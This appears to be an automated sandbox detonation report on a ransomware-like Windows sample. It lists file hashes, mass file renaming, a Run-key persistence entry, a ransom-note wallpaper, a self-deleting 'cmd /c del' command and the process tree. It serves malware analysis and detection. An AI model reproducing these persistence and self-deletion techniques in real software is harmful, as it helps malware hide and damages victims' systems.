| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0819cfa3fb4f3455d1c0578061b73fa2 |
| SHA1 | 47edfcf0a21ba7ebb3956e30a2750894b0d1f9c7 |
| SHA256 | c59801e3ae61d1087c3d212820dbc38353be8f09e2f619e3dd7fefe1c8b9bf24 |
| SHA512 | fdb65f559b12e430e4c608d4cd26bffc593042173c253f45994664a68e98cf9779a7aad8f5b4f1c47ad099e8e891c59125b9388f338ae814ac010efae3bb3775 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60ccd0b5dc0fbb6de5715b3e41965ac5 |
| SHA1 | dc84adb6b70c112a2edc68732c44b3232251265f |
| SHA256 | e64c946d29e93d22c02f26e44383c73c0693253c1ace95f7ad8e35fb1cd739ab |
| SHA512 | aede0b065c289a4a8c3ea6b7a2dbe2fa1412c54b44311846cedb4cafb3bc21770d96186b8d6fbaa4159db84870792737cd81075b10c941c7ba8c19e1f576e24e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 020dc77ce9f10056917f2f7de2cd3c20 |
| SHA1 | 5bf59b9970d3918ee92aa1a21098afa41d3f14f8 |
| SHA256 | fee718ce4e8bc56e7375d5353fb0ff6ae3f5c2ff77f4bde77fc4bf9aaf656511 |
| SHA512 | 7bc876a4a0fc107fc061be66ed6616b058ea250f48498426626a5d148d06801f22d55c6720ebd936da3093d606a2e1189d4aa8b63f1a4ea8dbaa373af2c16cef |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 827d971cd9cf1e4e5f7bc02391cb9c63 |
| SHA1 | 5f0fbbfe4e6c01a4059135b16c44161544805b06 |
| SHA256 | a65464ee6e9c2fe7f72e85793d8102e50cc626eb8b381922ad036ac30e64159f |
| SHA512 | 267d3ff4ab5c545a27052cdc835916987b4a501f61374427923f23686cd5d7155954ead4ab33973dfce78a9de6748ef86aa5417b8b0278c908707428c5291527 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e74ee57d09ff480d63632fdbede3bf38 |
| SHA1 | 2620fc49a37ac66e69c16fab97ac336924aaa31c |
| SHA256 | e05c28efab9e1671c01aab9b6fe9ce84881e26bfcc4582d509231fbb3652e242 |
| SHA512 | c42603503da572a92d187f720e20d2724fd0752da53d5492f8ca0cb74db1104a83a5889b5c6fce416f4d53795be7797eed669b4345171ff6691c0f0b555a1eb4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1966f40573392927f8a4ba8aefc042cd |
| SHA1 | 3a0a148871161aa8124d788a259207903582b9b1 |
| SHA256 | eb237694bc5fbd3b33494da18b7db98e0098ac3c050e57a827176117e05d75de |
| SHA512 | 8c2d78718a3380b4b59a7a2407b58d6d8e908d4db01b082baf44ac486b510d78eba6a496adbc83278f46048078bde44a233c9ba1b80c8682b54d9036aeffa673 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fb26b916eb3a3c0eebb0cbf72ee313a1 |
| SHA1 | b8ae9810563b80bc680f5e43eb690543bab5986f |
| SHA256 | fe42de7890daf4e40db1e92428bc7e1ca3345725a73764e76a94642f94399bf0 |
| SHA512 | e29f5da168296905347e02cf34aaf8edefb2f08b47c63d1063ea28359a57b24b3abf7d4931df21efc0442ae0d690b46f75cf0d3a931d2d0d4d587933400b5a2c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 32f7b5ad8f0c474ef00671bb2c9bb241 |
| SHA1 | 3fb9b6be5845f315807903a8595aba45b791591b |
| SHA256 | ee6888672be8fa1376f8b7020a455448a63510032aeb377d0fc0c5409fac04f6 |
| SHA512 | 007fcbd066b7e06c08d923832f91819485130cf9e2918cd27c5e36f35365a7a60875e459f1fc1a655035c846f5298f79ec37f9c9b4cd02bcb276a7117e431bfd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 49811d3f0b0605d98479f5d1e561b039 |
| SHA1 | 7cfe7320c5633629c80112037d56442500db15a8 |
| SHA256 | 69c84aef7bb20c3bfcebfc98da93059da49af1967c87079d7415132676b7a9ba |
| SHA512 | d9c37a1198344d98f07ee2f24435314c6b4af8d38ac09c865d0be786566605b474d049bcdcbc141217ed08d167d3fe4cf26a7f35637bb483eb0f338cc7c206f9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2b58f8226a902fb7ed1586fec36a9c0 |
| SHA1 | e383172ca82130b3dd10bf2c632c3657ba911a97 |
| SHA256 | 2b5ea2c12653ae7fb742b55381de1fdabc765940a89518943f4fe07998985812 |
| SHA512 | 58d5e4321c65c79341a00298ebe679c051e9c52789025a4b75eebff2469510171ec8f1e2423936df8d8a0ecd8bd5974b33ed25d81f36f980499440f6c9e57088 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f8a67e3d2da1e54941ecff70a72c97b |
| SHA1 | f7fc5d6070907047188e2e88bc4009a2ff268b22 |
| SHA256 | 4c0513e76178ae48cb2dfd49fef4596985665f6975957e58ec30353ceaa9204d |
| SHA512 | 530dd158e77a9d46d45d17b6dd593ea4f96ec5513a5ffc31ed28a85f2115747dcbbfae5088e248d831ce834de5743c6f56c4106344202931d75940048f4efe03 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | a0013763f961d6b0426111aa6a5b05d0 |
| SHA1 | e93c2126663767885c1b11415af7bd48c82f8f00 |
| SHA256 | 5297a69814f67723342e3c51915e76761dd10cbea620ee0ddc2801d096313393 |
| SHA512 | 1ad26a2813469a41df7f429579051bccd26dea7fb636cb1e442d525804aa01ab09661b37dba13226302089a00572711c8b2e91b5abd5db3dbe0197511923806e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\dnserror[1]
| MD5 | 73c70b34b5f8f158d38a94b9d7766515 |
| SHA1 | e9eaa065bd6585a1b176e13615fd7e6ef96230a9 |
| SHA256 | 3ebd34328a4386b4eba1f3d5f1252e7bd13744a6918720735020b4689c13fcf4 |
| SHA512 | 927dcd4a8cfdeb0f970cb4ee3f059168b37e1e4e04733ed3356f77ca0448d2145e1abdd4f7ce1c6ca23c1e3676056894625b17987cc56c84c78e73f60e08fc0d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\NewErrorPageTemplate[1]
| MD5 | cdf81e591d9cbfb47a7f97a2bcdb70b9 |
| SHA1 | 8f12010dfaacdecad77b70a3e781c707cf328496 |
| SHA256 | 204d95c6fb161368c795bb63e538fe0b11f9e406494bb5758b3b0d60c5f651bd |
| SHA512 | 977dcc2c6488acaf0e5970cef1a7a72c9f9dc6bb82da54f057e0853c8e939e4ab01b163eb7a5058e093a8bc44ecad9d06880fdc883e67e28ac67fee4d070a4cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BCOPU31\errorPageStrings[1]
| MD5 | e3e4a98353f119b80b323302f26b78fa |
| SHA1 | 20ee35a370cdd3a8a7d04b506410300fd0a6a864 |
| SHA256 | 9466d620dc57835a2475f8f71e304f54aee7160e134ba160baae0f19e5e71e66 |
| SHA512 | d8e4d73c76804a5abebd5dbc3a86dcdb6e73107b873175a8de67332c113fb7c4899890bf7972e467866fa4cd100a7e2a10a770e5a9c41cbf23b54351b771dcee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8P9TO0C6\httpErrorPagesScripts[1]
| MD5 | 3f57b781cb3ef114dd0b665151571b7b |
| SHA1 | ce6a63f996df3a1cccb81720e21204b825e0238c |
| SHA256 | 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad |
| SHA512 | 8cbf4ef582332ae7ea605f910ad6f8a4bc28513482409fa84f08943a72cac2cf0fa32b6af4c20c697e1fac2c5ba16b5a64a23af0c11eefbf69625b8f9f90c8fa |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | aff820b331f335a8fe146f4e29b1b773 |
| SHA1 | c75c4323d3458b416ad7e57c1d09e159dccb1560 |
| SHA256 | acbd94697846d032afa51fede69cb73ac3e0f9636640df505a228a32f13a871a |
| SHA512 | 84f6d24282ac13a6fff908a81345a664b019edf08e34fca41bfade5bbd36bd243b1fd6e143dded6c4007a66ed141c1b071b297c116ebba8a86cd4ef2ae0d3b7f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 297a0836fef44ee60054b15adc56e048 |
| SHA1 | 5f7521727bb1bd685c748558f8f138c837e19f31 |
| SHA256 | bf7bd9f02e34d453c4c414b84fab15d4e3df370ee40f5cf8a37d94f2587afd25 |
| SHA512 | c4be7f3ad71f502e4c106025046c9aad26b78e4ccab9490d83a4210f2c66fcdf12e88d793a8904c8e734c098aa7f62219d191aaca794ed60672b0252e809b494 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9615d7b41ba44757263b0a8d8881234e |
| SHA1 | 474c6a1b98bc161c1b4c273ecde828906d4992d6 |
| SHA256 | ab94531baff4171658b97340ad509843510fcca6602ee10a2237d05dab8a44c2 |
| SHA512 | dd54ca8563f45e54bf89372e693fd656b01d66148229e321f81e5a4758a6a08f5cc9a2eea2b844186a887ead1aff7593fc392322c267173744a5b8d297f0f09a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4ebf34eaa8b58b5ab9bc494a693179da |
| SHA1 | 7e44251e2482041876fe631418ab25f602e2bfb9 |
| SHA256 | 625aef39792e0262adbee5eca606e2cd4d92a50ad27e55fc159b68d2175337de |
| SHA512 | 972ea60ceca1a76327540e70a36e745f8b623f048975de058bdb7a1274644eccb71c5ac9e52b45db17fc24180380100e7f5ea3da096dd6b90572817cf3d05de9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 859a0cff4275e41014e045006a944dd5 |
| SHA1 | 60bb60b4c8fb6d966b281f452b88060d0ad61cac |
| SHA256 | 0df4c044fe016b58e9d41f947a2472ed7b54ab8944066ccd9369ba9161175c49 |
| SHA512 | 7802785dcc428bc75b99dc4d3cf7bb7e28ee4ffbdaa9c262fe8f5e948ac0923c0b8e6b33b48b9e1a8398f787368b2593520bbd1e2e759a937fd9ae76e63eed42 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2d387795ff4709b0db99c9c0cf6e39df |
| SHA1 | 19a9b3e7504447daff4bddc9ca15be56e158c1e6 |
| SHA256 | a77630a905afb58d145cd8d82e09aad5234d3875d591ffe60f1fd64a0d1c03e5 |
| SHA512 | a1e3d5e4c3dd87d2d78ea43728558ab474cd2e0c9c8bf7988f99db4064ee293a9e725b6b9e5faa8f8105249da9ed110b24ec68c834b9b573fd5f7caaec6db1ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 934e62347a4174d71e1fb6983264da70 |
| SHA1 | 3bcc8c2739c4bf55d0b6ec395991ae7f9320a4b5 |
| SHA256 | ac0c73f28079b5bdce6abaec2718136767d65b22f629023c2965ae7b693c9cf6 |
| SHA512 | 42c8a35ca69e399db3563ce0a67066fa170edfff101617a39e82059de86ada10f8679d501d90bca57e197deeb764104c216ceeaab5a8585abd970419a2ad24db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 803a82b6c7dd89fc63c1ee57b7aabc51 |
| SHA1 | 7ae5fcd772d9abd80c51ddd42d511577d835a85d |
| SHA256 | cd9d155508135b4c1c5f542a6884d29c64cf3c4267b1fa34d7b84311ab6ab0d6 |
| SHA512 | 3d6c4fcbe944ff68f2126008c22ac234ab304be1d6d1aa160bcd10390d96a50034bd100eec594d90e79aa77227c65596585047486eb8827eaae2ea6907eac7b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fb0f59d0ef9ba51078cce2a0023f963 |
| SHA1 | ed2d23d28d21fa0acd02324a06f4cc8802f0a49b |
| SHA256 | b565acf191579a324a03ece53c484f2a86565df26e96df49ff65a8454e6079b3 |
| SHA512 | f3602daa9723d1723e98ce009189982cf404a19a514983193fe0fd17411d043e593736e0dae6c59708ee3cc43a2d54828a44dd0b566a5aa22a7f883dc85968f0 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win11-20241023-en
Max time kernel
91s
Max time network
82s
Command Line
Signatures
Renames multiple (4011) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\crypto13 = "C:\\Users\\Admin\\AppData\\Roaming\\ysljjud.exe" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\default.help.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\es-ES\MSFT_RegistryResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\lipeula.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\fr-FR\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ProcessResource\ja-JP\MSFT_ProcessResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\it-IT\MSFT_GroupResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\fr-FR\MSFT_WindowsOptionalFeature.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\ServiceSet\ServiceSet.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_TO_DECRYPT_YOUR_FILES.bmp" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\diagnostics\system\Power\fr-FR\RS_Balanced.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\css\oobe-light.css | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\Public\wsxpacks\Account\assets\__\lib-localization\dist\resources\sr-Latn-RS.json | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\Cortana.UI\Assets\Icons\AppListIcon.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\memoryAnalyzer\images\status_heap_increase.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\MessageOverlayControl.css | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\f\resources.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\localNgc.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\FileExplorerExtensions\Assets\images\contrast-standard\theme-dark\windows.unpinfromstartscreen.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.120_ru-ru_70626ad0aa00edcc\f\RS_Balanced.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars42.contrast-white_scale-200.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.22000.1_none_1e7f12b35c10d87a\TextReply.scale-150.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.powershell.dsc.resources_31bf3856ad364e35_10.0.22000.1_de-de_7bb95fa12dc9f6c5\PSDesiredStateConfiguration.Resource.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\Cursors\link.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\diagnostics\system\IEBrowseWeb\es-ES\RS_RestoreIEconnection.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-k..iagnostic.resources_31bf3856ad364e35_10.0.22000.1_es-es_1e98d7dbbca7bad2\CL_LocalizationData.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.22000.120_none_bb415867ae85d51c\serviceworkericon.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\ysljjud.exe
C:\Users\Admin\AppData\Roaming\ysljjud.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
